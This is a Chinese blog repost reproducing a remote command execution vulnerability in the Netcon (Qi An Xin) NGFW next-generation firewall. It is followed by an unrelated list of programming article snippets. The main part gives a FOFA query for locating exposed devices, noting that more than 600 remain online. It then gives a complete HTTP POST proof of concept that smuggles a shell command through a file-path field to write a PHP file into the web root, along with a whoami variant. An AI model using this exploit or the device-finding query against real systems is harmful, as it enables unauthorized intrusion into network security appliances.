漏洞复现-网康(奇安信)NGFW下一代防火墙远程命令执行

news2024/11/20 6:29:09

漏洞描述

网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。

FOFA语法:app="网康科技-下一代防火墙"

 截止到6.23号这fofa资产里还有600+

POC


POST /directdata/direct/router HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 188
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php"]}],"type":"rpc","tid":17}

运行该命令后回显md5值后会删除文件

echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php

 也可以直接whoami验证

whoami >/var/www/html/whoami.txt

技术文章仅供参考,此文所提供的信息仅用于学习,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/699375.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vscode python 自定义函数无法跳转到定义处,且定义处无法展示所有调用该函数的位置

问题描述 在vscode中编写python代码&#xff0c;在自定义类的forward函数中调用该类的成员函数&#xff0c;但在调用处无法通过ctrl鼠标左键直接跳转到该成员函数的定义中&#xff0c;系统显示找不到函数声明。同时&#xff0c;在该函数的定义处无法通过ctrl鼠标左键展示项目中…

React小项目-题解列表

1. 项目初始化 首先创建一个新项目 solution-app&#xff1a; npx create-react-app solution-app cd solution-app npm start先将 src 目录中除了 index.css 与 index.js 之外的文件删除&#xff0c;然后创建一个 components 目录&#xff0c;在该目录中创建一个 solution.j…

浅析舆情监测系统

舆情及内容简述 大家对于“舆情”应该有一个简单地概念&#xff0c;尤其是在现在微博、微信、知乎、抖音等平台普及化的今天&#xff0c;舆情的力量日渐凸显。比如最近萧敬腾的求婚、《消失的她》的热议、ikun的翻车等等&#xff0c;舆情既可以让明星塌房&#xff0c;也会让一…

Android Compose UI实战练手----Google Bloom登录页

目录 1.概述2.页面展示1.1 亮色主题1.2暗色主题 3.登录页面拆分以及编码实现3.1 登录页面拆分3.2 编码实现3.2.1 LoginPage3.2.2 LoginTitle3.2.3 LoginInoutBox3.2.4 LoginHintWithUnderLine3.2.5 LoginButton 4.源码地址 1.概述 在之前的章节中我们已经介绍了如何实现Google…

每个前端开发需要了解的10个强大的CSS属性

微信搜索 【大迁世界】, 我会第一时间和你分享前端行业趋势&#xff0c;学习途径等等。 本文 GitHub https://github.com/qq449245884/xiaozhi 已收录&#xff0c;有一线大厂面试完整考点、资料以及我的系列文章。 快来免费体验ChatGpt plus版本的&#xff0c;我们出的钱 体验地…

vue 启动项目报错:TypeError: Cannot set property ‘parent‘ of undefined异常解决

场景&#xff1a;从git上面拉下来一个项目 npm i 下载完依赖以后 npm run serve 去运行项目的时候 报错TypeError: Cannot set property ‘parent’ of undefined 如图所示 原因&#xff1a;首先排查发现判断得出是less解析失败导致 但是经过长时间的查询解决方案发现是因为v…

【Redis一】Redis简介及安装部署

Redis简介及安装部署 1.关系数据库 VS 非关系型数据库1.1 关系型数据库1.2 非关系型数据库1.3 关系型数据库和非关系型数据库区别1.4 非关系型数据库产生背景1.5 关系型数据库与非关系型数据库总结 2.Redis简介2.1 Redis概述2.2 Redis的优点2.3 Redis使用场景2.4 关于Redis的高…

nginx配置vue项目添加访问前缀

文章目录 前言实现需求Nginx配置访问前端正确配置注意点alias的含义举个栗子静态文件及js等404错误 前言 最近&#xff0c;在搞一个SASS系统&#xff0c;将原有的单服务&#xff0c;每次卖出一套啥软件就需要部署一套环境&#xff0c;使得运维人员有些捉襟见肘。产品调整为SAS…

链表理论基础

链表是一种通过指针串联在一起的线性结构&#xff0c;每一个节点由两部分组成&#xff0c;一个是数据域&#xff0c;一个是指针域&#xff08;存放指向下一节点的指针&#xff09;。 链表的类型 单链表 每一个节点由两部分组成&#xff0c;一个是数据域一个是指针域&#xf…

汽车 EDI:博泽 brose EDI 需求分析

brose&#xff08;博泽&#xff09;是一家德国汽车零部件制造商&#xff0c;总部位于德国科堡。该公司成立于1908年&#xff0c;至今已有百年历史。brose主要专注于汽车驾驶员控制系统、座椅系统、电动驱动系统和电子技术等领域的开发和生产。作为一家全球化企业&#xff0c;br…

linux修改root密码

Linux修改root密码 红帽系统&#xff1a; 进入开机界面按e。 在linux这行末尾加上rd.break 然后按下ctrlx 按下图输入命令&#xff1a; redhat 即为你想修改的密码。 然后回车等待系统重启。 CentOS7: 前两步和之前一样&#xff0c;然后找到linux16这一行。 在这行末尾…

芯片设计中的功耗挑战和低功耗设计

在早期的IC设计中&#xff0c;关注的参数主要是性能(timing)和面积(area)。EDA工具在满足性能要求的情况下&#xff0c;最小化面积。此时&#xff0c;功耗是一个不怎么被关心的问题。 因为CMOS工艺在相对较低的时钟频率下具有相当低的功耗&#xff0c;漏电流可忽略不计。随着晶…

springboot+vue校园车辆校车调度管理系统_r4le2-

本论文中实现的校车调度管理系统将以用户核心的日常信息维护工作为主&#xff0c;主要涵盖了首页&#xff0c;个人中心&#xff0c;驾驶员管理&#xff0c;车辆信息管理&#xff0c;借调车辆管理&#xff0c;车辆调度管理&#xff0c;车辆运营管理等功能&#xff0c;采用该校车…

浏览器如何捕获元素的hover事件弹出的内容,并进行样式调整修改

项目场景&#xff1a; 最近前端需要重写antd的tab卡片的更多内容弹框&#xff0c;默认的背景色和文本颜色不合适&#xff0c;需要更改。 问题描述 只有鼠标指针放上去后才会显示弹出的内容 直接用审查元素还无法进行获取。 如何用浏览器的开发者工具去捕获这些浮框内容或其他…

js中的图是什么?

图 什么是图&#xff1f; 图是网络结构的抽象模型&#xff0c;是一组由边连接的节点。图可以表示任何二元关系&#xff0c;比如道路、航班等。在 JavaScript 中没有图&#xff0c;但是可以通过 Object 和 Array 来构建图。 常用操作 深度优先遍历广度优先遍历 图的表示法 …

sql内外连接图示

student表数据&#xff1a; idname34name22golitter66kerwin123yh12golemon score表数据&#xff1a; idscore34802298663345100 内连接 1、内连接:俗称左右拼接连接&#xff1b; 2、内连接特点&#xff1a;满足连接条件的才会出现在结果里面&#xff1b; SELECT 查询字段…

第 7 章 集合-----Scala集合继承图

7.1.1 不可变集合继承图 7.1.2 可变集合继承图 7.2.3 不可变数组与可变数组的转换 7.7.6 复杂 WordCount 案例 1&#xff09;方式一 object TestWordCount {def main(args: Array[String]): Unit {// 第一种方式&#xff08;不通用&#xff09;val tupleList List(("H…

WebRTC的认知入门

一、学习目的 当前的音视频聊天功能很普通&#xff0c;社会对这方面的需求也很高&#xff0c;疫情期间的在线问诊模式解决类大量急需就医问诊患者的燃眉之急&#xff0c;我们需要了解WebRTC实现实时音视频聊天功能是如何操作的。 二、概念 什么是WebRTC?WebRTC是 Google 在…

开放式耳机是什么意思?开放式耳机和封闭式耳机区别又有哪些?

开放式蓝牙耳机的设计理念旨在为用户提供更加自然、开放的音频体验。与传统的封闭式耳机相比&#xff0c;开放式耳机的设计目的是最大程度地减少音频在耳道中的阻隔&#xff0c;使周围环境的声音与耳机音频混合在一起&#xff0c;创造更加逼真的音场感。 开放式蓝牙耳机非常适合…

6.3.2 可翻页检视

前面提到的 nl 与 cat, tac 等等&#xff0c;都是一次性的将数据一口气显示到屏幕上面。一页一页翻动的指令就是more和less。 more &#xff08;一页一页翻动&#xff09; 看到上面的范例&#xff0c;如果more后面接的文件内容行数大于屏幕输出的行数时&#xff0c;就会出现类…